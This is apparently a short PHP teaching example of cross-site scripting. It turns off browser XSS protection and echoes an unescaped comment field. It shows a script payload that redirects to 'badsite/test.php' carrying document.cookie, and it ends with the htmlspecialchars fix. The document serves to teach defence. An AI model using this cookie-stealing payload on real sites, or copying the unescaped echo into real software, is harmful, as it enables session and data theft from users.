XSS attack
* XSS (Cross-Site Scripting): every application that displays user input is at risk. The attack only works when the application fails to escape its output, so it is easy to prevent by escaping output correctly.
<!-- Browsers have some XSS protection; disable it for this test example -->
<?php header('X-XSS-Protection: 0'); ?>

<!-- Logged-in user data stored in a cookie -->
<script>
function setCookie(c_name, value, exdays) {
    var exdate = new Date();
    exdate.setDate(exdate.getDate() + exdays);
    var c_value = escape(value) + ((exdays == null) ? "" : "; expires=" + exdate.toUTCString());
    document.cookie = c_name + "=" + c_value;
}
setCookie('username', 'john');
setCookie('email', 'john@yahoo.com'); // --- Look Here --- //
</script>

<!-- User submits a malicious comment -->
<form method="POST">
    Add a comment:
    <textarea name="comment">
<script>
document.location = "badsite/test.php?cookies=" + document.cookie;
</script>
    </textarea>
    <input type="submit" name="btn_submit"/>
</form>

<!-- Submitted comment is displayed -->
<?php
if (isset($_POST['btn_submit'])) {
    if (!empty($_POST['comment'])) {
        echo $_POST['comment']; // --- Look Here --- //
        // The unescaped comment runs as script and redirects the browser to:
        // badsite/test.php?cookies=username=john&email=john@yahoo.com
        // exposing the logged-in user's private data.

        // Solution // --- Look Here --- //
        // echo filter_var($_POST['comment'], FILTER_SANITIZE_STRING);
        // Note: FILTER_SANITIZE_STRING is deprecated since PHP 8.1; the standard
        // output-escaping fix is to HTML-encode the value at the point of output:
        // echo htmlspecialchars($_POST['comment'], ENT_QUOTES, 'UTF-8');
    }
}

stackoverflow.com
1) What is an XSS attack?




2) What protection exists for XSS attacks?







